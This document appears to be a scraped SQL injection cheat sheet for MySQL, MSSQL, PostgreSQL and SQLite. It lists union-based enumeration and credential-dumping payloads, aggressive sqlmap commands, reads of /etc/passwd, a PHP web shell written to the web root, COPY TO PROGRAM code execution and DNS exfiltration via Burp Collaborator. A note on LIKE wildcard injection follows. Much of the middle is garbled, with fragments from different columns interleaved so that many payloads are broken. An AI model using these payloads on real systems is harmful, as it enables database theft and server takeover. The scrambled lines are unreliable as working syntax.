SQL Injection
MSQL
Database enumeration
TestMySQL
SELECT GROUP_CONCAT(schema_name,'
or 1=1-- -
Identify number columns
Increase from 1 (column),'
order by 1-- -Until error or different content
' order by 7-- -
Confirm number columns
' union select 1,2,@@VERSION,DB_NAME(),5,6-- -
Get tablesSELECT
' union select 1,2,table_name,4,5,6FROMINFORMATION_SCHEMA.TABLES--information_schema.schemata;-
Get columns from table
Users
GROUP_CONCAT(table_name,'
union select 1,2,name,4,5,6,') FROMsyscolumnsinformation_schema.tables; SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHEREid=(SELECT id FROM sysobjects WHERE nametable_name = 'Users')-- -
Dump data from table
Users
' union select 1,2,username,password,4,5 FROM Users-- -
SQLMAP
Use file
sqlmap -r file.txt --batch --level 5 --risk 3users';
Post requestPostgreSQL
sqlmapSELECT-udatname FROM pg_database; SELECT string_agg(table_name,',') FROM information_schema.tables; SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name = 'https://website/page.php'users';-XPOSTSQLite
--dataSELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master WHERE type='table' AND tbl_name NOT like '
action=edit&id=3'sqlite_%';--cookie="abcdefg12345"SELECT--batchsql--dumpFROM--levelsqlite_master5WHERE--risktbl_name='users';3SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users');
BypassError based
Encoding payload using utf-16PostgreSQL
user_input'=ANDinput(1=CAST((SELECT username FROM users) AS int)--File read/write & RCE
PostgreSQL
SELECT pg_ls_dir('
>.'); SELECT pg_read_file('/etc/passwd'); COPY (SELECT ').strip(')utfTO=PROGRAM[f"\\u00{ord(i):02x}"'sleepfor5';iinMySQL
user_input]SELECT
print(LOAD_FILE('/etc/passwd'); SELECT '.join(utf)<?php system($_REQUEST[c]); ?>' INTO OUTFILE '/var/www/html/shell.php';Faster Exfiltration via DNS
- https://github.com/PortSwigger/sqlmap-dns-collaborator
- https://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf
SqlmapDnsCollaborator is a Burp Extension that lets you perform DNS exfiltration with Sqlmap with zero configuration needed. You won't need a domain name or a public IP, just a computer with Sqlmap and Burp.
How you would normally perform DNS exfiltration with Sqlmap:
- You buy a domain name, a public IP and then you set up a server
- You run Sqlmap on that server, which performs some SQL injection on the vulnerable target.
- Vulnerable target sends DNS requests to your DNS server containing interesting data.
- DNS requests are interpreted by Sqlmap.
How you are going to perform DNS exfiltration with Sqlmap and SqlmapDnsCollaborator:
- You open Burp on your computer and enable SqlmapDnsCollaborator.
- You run Sqlmap on your computer, which performs some SQL injection on the vulnerable target.
- Vulnerable target sends DNS requests to Burp Collaborator containing interesting data.
- SqlmapDnsCollaborator reads DNS requests from Burp Collaborator and sends them to Sqlmap.
- DNS requests are interpreted by Sqlmap.
sqlmap.py -r req.txt --dns-domain=yourcollab.burpcollaborator.net -v3
SQL "LIKE" Wildcard Injection
This vulnerability, often overlooked and considered low risk, can have significant impacts in certain scenarios. It involves injecting a wildcard in the search field of a LIKE clause in a SQL statement.
Types of Wildcards
-
%
: Equivalent to any string of zero or more characters. -
_
: Equivalent to any single character.
Vulnerability
An application becomes vulnerable when it uses the LIKE operator with a user-received parameter without filtering these wildcards. For example:
SELECT text FROM table WHERE secrets LIKE '$secret'
Even if the $secret
parameter is sanitized to prevent SQL injection, wildcards can still be injected:
http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________
"_" are the chars that match the wildcard